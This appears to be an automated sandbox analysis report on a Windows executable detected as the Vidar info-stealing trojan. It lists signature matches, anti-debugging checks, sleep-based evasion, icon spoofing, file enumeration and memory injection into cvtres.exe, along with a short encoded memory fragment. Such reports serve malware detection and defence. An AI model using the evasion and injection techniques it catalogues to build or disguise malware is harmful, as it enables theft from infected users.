              Source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: Process Memory Space: uGfpJynSWM.exe PID: 6360, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: Process Memory Space: cvtres.exe PID: 6392, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B25500_2_013B2550
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B29F00_2_013B29F0
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1C100_2_013B1C10
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B04480_2_013B0448
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BC88F0_2_013BC88F
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B93300_2_013B9330
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BEB100_2_013BEB10
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B2F700_2_013B2F70
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BA6800_2_013BA680
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B3EC00_2_013B3EC0
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B59280_2_013B5928
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B59180_2_013B5918
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B29E00_2_013B29E0
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B5C300_2_013B5C30
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B5C200_2_013B5C20
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B907E0_2_013B907E
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B90A80_2_013B90A8
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B64A80_2_013B64A8
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B64980_2_013B6498
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BC89C0_2_013BC89C
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B10880_2_013B1088
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B6F310_2_013B6F31
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BAB290_2_013BAB29
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BAB1A0_2_013BAB1A
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B6F480_2_013B6F48
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B5FD80_2_013B5FD8
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B5FC80_2_013B5FC8
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B0FC00_2_013B0FC0
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B62300_2_013B6230
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BCE060_2_013BCE06
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BA6710_2_013BA671
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BCE6A0_2_013BCE6A
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B6AA90_2_013B6AA9
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BAA850_2_013BAA85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0042C0721_2_0042C072
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040781A1_2_0040781A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0042B0851_2_0042B085
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004320B01_2_004320B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0042B8B81_2_0042B8B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041E9601_2_0041E960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004199701_2_00419970
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040593E1_2_0040593E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040513E1_2_0040513E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004062D91_2_004062D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00431B5F1_2_00431B5F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041BB331_2_0041BB33
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004334C41_2_004334C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0042BC8A1_2_0042BC8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0042B51A1_2_0042B51A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040665A1_2_0040665A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0043160E1_2_0043160E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041C6DE1_2_0041C6DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0043278C1_2_0043278C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 0042083E appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 00403B11 appears 80 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 00427300 appears 47 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 004207D5 appears 39 times
              Source: uGfpJynSWM.exe, 00000000.00000002.335835109.0000000000EE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs uGfpJynSWM.exe
              Source: uGfpJynSWM.exe, 00000000.00000000.326996035.0000000000884000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVBZXBVZXBNSDMHBDSJ67327632.exeV vs uGfpJynSWM.exe
              Source: uGfpJynSWM.exeBinary or memory string: OriginalFilenameVBZXBVZXBNSDMHBDSJ67327632.exeV vs uGfpJynSWM.exe
              Source: uGfpJynSWM.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: uGfpJynSWM.exeStatic PE information: invalid certificate
              Source: uGfpJynSWM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: uGfpJynSWM.exeVirustotal: Detection: 67%
              Source: uGfpJynSWM.exeMetadefender: Detection: 31%
              Source: uGfpJynSWM.exeReversingLabs: Detection: 80%
              Source: uGfpJynSWM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\uGfpJynSWM.exe "C:\Users\user\Desktop\uGfpJynSWM.exe"
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uGfpJynSWM.exe.logJump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@3/1@2/3
              Source: uGfpJynSWM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00415A22 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,Process32Next,CloseHandle,1_2_00415A22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: uGfpJynSWM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: uGfpJynSWM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: uGfpJynSWM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdb source: uGfpJynSWM.exe
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdbh) source: uGfpJynSWM.exe
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B131D push ds; iretd 0_2_013B131F
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B123F push ds; iretd 0_2_013B1240
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B127C push ds; iretd 0_2_013B1282
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B126A push ds; iretd 0_2_013B126B
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1A65 push ss; iretd 0_2_013B1A67
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1A4E push ss; iretd 0_2_013B1A50
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12A7 push ds; iretd 0_2_013B12AD
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1A99 push ss; iretd 0_2_013B1A9A
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1290 push ds; iretd 0_2_013B1296
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12ED push ds; iretd 0_2_013B12EF
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12D6 push ds; iretd 0_2_013B12D8
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12C3 push ds; iretd 0_2_013B12C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00420874 push ecx; ret 1_2_00420887
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00427345 push ecx; ret 1_2_00427358
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041899F LoadLibraryA,Sleep,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041899F
              Source: uGfpJynSWM.exeStatic PE information: real checksum: 0x65142 should be: 0x619f4
              Source: initial sampleStatic PE information: section name: .text entropy: 7.888541504684198

              Hooking and other Techniques for Hiding and Protection

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041899F LoadLibraryA,Sleep,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041899F
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exe TID: 6380Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6396Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00414F0E __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,GetSystemInfo,1_2_00414F0E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041208D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,1_2_0041208D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040C955 lstrcatA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_0040C955
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411117 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00411117
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004101E9 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_sprintf,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004101E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004162AB __EH_prolog3_GS,FindFirstFileW,FindNextFileW,1_2_004162AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00408B15 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlen,1_2_00408B15
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041048F wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0041048F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040954D wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,FindNextFileA,FindClose,1_2_0040954D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411DA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411DA6
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 120000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00409ADF lstrcatA,lstrcatA,lstrcatA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_00409ADF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeAPI call chain: ExitProcess graph end nodegraph_1-22798
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeAPI call chain: ExitProcess graph end nodegraph_1-23054
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeAPI call chain: ExitProcess graph end nodegraph_1-23052
              Source: uGfpJynSWM.exe, 00000000.00000002.337519094.0000000004070000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.337246414.0000000003F85000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.337026902.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336750642.0000000003D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %QDHgFSv
              Source: uGfpJynSWM.exe, 00000000.00000002.337932491.000000000415B000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.338200749.0000000004223000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336549703.0000000003CC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %uGSvAQDHgFSvAQA
              Source: cvtres.exe, 00000001.00000002.594418105.0000000004CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: uGfpJynSWM.exe, 00000000.00000002.338696445.00000000042EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %uGSvAQDHgFSvAQABAAAAibhYrwEAibhcrwEAibhsrwEAi0QkDIteSIPAKugj0///i0QkDItOSIPABFCLQQToruP//4tGSFnoOun//4tOSImGkAAAADPAObmkrwYAX1t0BbgAAAAFwgQAVYvsUYNl/ABTVleL8L8AQAAA6xuD+/90KFONhpQAAABQi87offn//zvDdSUBXfxXjZ6UAAAA6P/9//+L2IXbddOLRfy
              Source: cvtres.exe, 00000001.00000002.594418105.0000000004CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BE628 CheckRemoteDebuggerPresent,0_2_013BE628
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00423890 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00423890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041899F LoadLibraryA,Sleep,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041899F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00414C66 __EH_prolog3_GS,GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,wsprintfA,1_2_00414C66
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00423890 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00423890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041DA9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041DA9B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00428C1D SetUnhandledExceptionFilter,1_2_00428C1D

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 435000Jump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 443000Jump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 459000Jump to behavior
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 48B0008Jump to behavior
              .NET source code references suspicious native API functions
              Source: uGfpJynSWM.exe, MJCKVKLUIOR/MJCKVKLUIOR.csReference to suspicious API methods: ('\\x08', 'GetProcAddress@kernel32'), ('\t', 'LoadLibraryA@kernel32')
              Source: uGfpJynSWM.exe, A/u000f.csReference to suspicious API methods: ('\t', 'GetProcAddress@kernel32.dll'), ('\\x1D', 'OpenProcess@kernel32.dll'), ('\\x08', 'GetProcAddress@kernel32.dll'), ('\\x1A', 'GetProcAddress@kernel32.dll'), ('\\x03', 'LoadLibrary@kernel32.dll'), ('\\x18', 'GetProcAddress@kernel32.dll'), ('\\x11', 'GetProcAddress@kernel32.dll'), ('\\x15', 'GetProcAddress@kernel32.dll')
